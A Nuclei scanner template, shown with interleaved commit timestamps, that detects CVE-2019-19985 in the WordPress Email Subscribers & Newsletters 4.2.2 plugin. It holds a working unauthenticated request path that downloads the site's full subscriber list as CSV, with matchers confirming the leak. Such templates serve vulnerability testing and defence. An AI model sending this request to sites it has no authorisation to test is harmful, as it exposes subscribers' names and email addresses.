nuclei-templates/cves/CVE-2019-19985.yaml

33 lines
749 B
YAML
Raw Normal View History

id: cve-2019-19985
2020-08-04 20:19:57 +00:00
info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
2020-08-15 08:04:58 +00:00
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
2020-08-04 20:19:57 +00:00
severity: medium
# Source:- https://www.exploit-db.com/exploits/48698
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
matchers-condition: and
matchers:
- type: word
words:
- Name
- Email
- Status
- Created On
2020-08-15 08:04:58 +00:00
condition: and
2020-08-12 17:44:53 +00:00
part: body
2020-08-15 08:04:58 +00:00
- type: word
words:
- "Content-Disposition: attachment; filename=all-contacts.csv;"
part: header
2020-08-04 20:19:57 +00:00
- type: status
status:
2020-08-12 17:44:53 +00:00
- 200